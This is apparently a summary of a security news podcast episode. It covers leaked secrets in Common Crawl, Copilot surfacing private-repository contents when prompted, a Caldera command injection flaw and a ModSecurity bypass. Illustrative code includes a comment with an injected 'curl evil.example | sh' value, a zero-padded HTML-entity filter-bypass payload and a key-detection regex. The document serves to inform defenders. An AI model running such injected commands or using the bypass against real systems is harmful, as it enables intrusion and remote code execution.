SANS Stormcast Daily Cyber Security Podcast
Episode: March 3, 2025: AI Training Data Leaks; MITRE Caldera Vuln; modsecurity bypass
Host: Johannes B. Ullrich
Location: Recording from Baltimore, Maryland
Overview
In this brisk episode, Johannes B. Ullrich delivers a rundown of recent, high-impact stories in information security. The main themes are the persistent risk of sensitive data leaking through AI training datasets, specific vulnerabilities in popular security tools like MITRE Caldera and ModSecurity, and the implications for practitioners and organizations.
Key Discussion Points & Insights
1. AI Training Data Leaks: Truffle Security, TruffleHog, and Common Crawl
[00:28 - 03:07]
- Truffle Security Research:
  - Truffle Security (the makers of TruffleHog) analyzed Common Crawl's massive web archive (~400 TB).
  - They discovered about 12,000 "live" API keys and secrets exposed in past and present versions of the dataset.
  - TruffleHog verifies whether credentials are still active, filtering out expired or sample credentials.
- Historic Exposure Issues:
  - Common Crawl archives roughly a decade of web data, so even old, once-leaked information remains accessible.
  - "From my own experience, particularly for a smaller website, the vast majority of sort of hits you get is crawlers like this." — Johannes B. Ullrich [02:28]
- Supply Chain Connection:
  - Many exposed secrets appear across multiple sites, implying shared supplier code or JavaScript rather than just demo keys.
- Security Takeaway:
  - If sensitive keys or credentials were ever publicly exposed, even temporarily, "assume it got captured by someone." [02:40]
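The scan-then-verify approach described above can be sketched in a few lines. This is an illustrative toy, not TruffleHog's actual implementation: the regex below matches the well-documented AWS access key ID format, and real scanners carry hundreds of such detectors plus live verification calls against each provider's API.

```python
import re

# Well-known AWS access key ID format (publicly documented):
# "AKIA" followed by 16 uppercase alphanumeric characters.
AWS_KEY_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

def find_candidate_secrets(text: str) -> list[str]:
    """Return substrings that merely LOOK like AWS access key IDs."""
    return AWS_KEY_RE.findall(text)

# The verification step -- what separates a "live" key from noise --
# would call the provider (e.g. AWS STS GetCallerIdentity) and is
# deliberately omitted here.
page = "config = { key: 'AKIAIOSFODNN7EXAMPLE' }"
print(find_candidate_secrets(page))
```

The example key is AWS's official documentation placeholder, so nothing sensitive is embedded here; the point is that crawled pages are trivially greppable for such patterns at archive scale.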
2. AI Training from Private GitHub Repositories: Lasso Security Findings
[03:08 - 04:32]
- GitHub Copilot Issue:
  - Research from Lasso Security found that Copilot's AI training data includes content from now-private repositories if they were public at any point.
  - Copilot does not remove a repository's data from its models after the repository is made private.
- Security & Privacy Implication:
  - There are "literally thousands of these repositories" (including ones from big-brand companies) exposed this way.
  - Worse, with the right prompts, users can query Copilot for "a list of files in that particular repository." [03:52]
- Main Message:
  - Any data that was ever public, even briefly, may remain in third-party datasets indefinitely and should be considered leaked.
3. MITRE Caldera Vulnerability: Command Injection
[04:33 - 05:37]
- Background:
  - MITRE Caldera is a framework for simulating adversarial (red team) attacks.
- Vulnerability:
  - Affects the Manx and Sandcat agents, which can be compiled just-in-time for specific platforms, with parameterized build actions.
  - An attacker can inject compile parameters, leading to arbitrary code execution (i.e., command injection).
- Risk Perspective:
  - The vulnerability affects an attack simulation tool that is designed to execute code for red teamers, but that capability should be restricted to authenticated users.
  - Not likely to be widely exploited, but a serious risk for targeted attacks or insider misuse.
- Remediation:
  - MITRE published a detailed postmortem and a proof-of-concept exploit. Prompt updates are recommended.
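The injection class described above is worth illustrating, though the sketch below is generic and not Caldera's actual code: when user-supplied build parameters are spliced into a shell command string, shell metacharacters turn a compile request into arbitrary command execution. The `go build` invocation and allow-list are hypothetical.

```python
ALLOWED_FLAGS = {"-s", "-w", "-trimpath"}  # hypothetical allow-list

def build_command_unsafe(platform: str, extra_flags: str) -> str:
    # Vulnerable pattern: user input spliced into a shell string.
    # With extra_flags = "-s; curl evil.example | sh", a shell would
    # run the injected command right after the build step.
    return f"go build -o agent-{platform} {extra_flags} ./agent"

def build_command_safe(platform: str, extra_flags: list[str]) -> list[str]:
    # Safer pattern: an argv list is never parsed by a shell, and an
    # allow-list drops anything that is not a known compiler flag.
    flags = [f for f in extra_flags if f in ALLOWED_FLAGS]
    return ["go", "build", "-o", f"agent-{platform}", *flags, "./agent"]
```

The argv-list form (passed to an exec-style API rather than a shell) plus strict validation of each parameter is the standard mitigation for this vulnerability class.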
4. ModSecurity Bypass Vulnerability
[05:38 - End (~06:10)]
- Details:
  - A bug in a specific ModSecurity version allows rules to be bypassed by prepending leading zeros to HTML-encoded (numeric character reference) values.
- Severity:
  - Not deeply severe for every deployment, but "it does allow bypassing of modsecurity rules, and since that's the point of modsecurity, it sort of invalidates the tool somewhat." — Johannes B. Ullrich [05:55]
  - Only one version is affected; review your deployment and update as necessary.
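The bypass class can be demonstrated with plain Python, though this is an illustrative sketch of the general technique, not ModSecurity's actual rule logic: HTML numeric character references permit leading zeros, so `&#0060;` decodes to the same `<` as `&#60;`, and a naive filter that matches only the canonical encoding misses the padded form while the backend decodes it normally.

```python
import html

CANONICAL_LT = "&#60;"  # canonical numeric character reference for "<"

def naive_rule_matches(payload: str) -> bool:
    # A naive, hypothetical filter that only checks the literal character
    # and its canonical encoding -- standing in for an inspection rule
    # that normalizes input incompletely.
    return "<" in payload or CANONICAL_LT in payload

payload = "&#0060;script&#0062;"   # zero-padded references, same characters
decoded = html.unescape(payload)   # what the application ultimately sees

print(naive_rule_matches(payload))  # False: the padded form slips past
print(decoded)                      # <script> reaches the backend anyway
```

The general lesson is that any filter must normalize input exactly the way the downstream consumer does; every gap between the two decoders is a bypass.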
Notable Quotes & Moments
- On crawler exposure:
  "From my own experience, particularly for a smaller website, the vast majority of sort of hits you get is crawlers like this. So no real big surprise if these credentials end up pretty quickly in repositories like this common crawl and can then easily be abused."
  — Johannes B. Ullrich [02:28]
- On AI training data permanence:
  "If at any point in time your data was exposed, assume it got captured by someone and, well, has to be considered leaked at this point."
  — Johannes B. Ullrich [04:20]
- On the ModSecurity vulnerability's irony:
  "It does allow bypassing of modsecurity rules, and since that's the point of modsecurity, it sort of invalidates the tool somewhat."
  — Johannes B. Ullrich [05:55]
Timestamps for Key Segments
- 00:28: Start of AI training data leak discussion (Truffle Security, Common Crawl)
- 02:40: Security takeaway about exposure permanence
- 03:08: Lasso Security’s GitHub Copilot findings
- 04:33: MITRE Caldera vulnerability
- 05:38: ModSecurity bypass vulnerability discussed
Takeaway
This concise episode spotlights the persistent nature of sensitive data leaks in AI and public datasets, and highlights the complexities of modern security tooling and frameworks. The reminders are clear: anything public, even briefly, may be permanently accessible, and robust review and patching remain essential in both defensive and attack-simulation contexts.
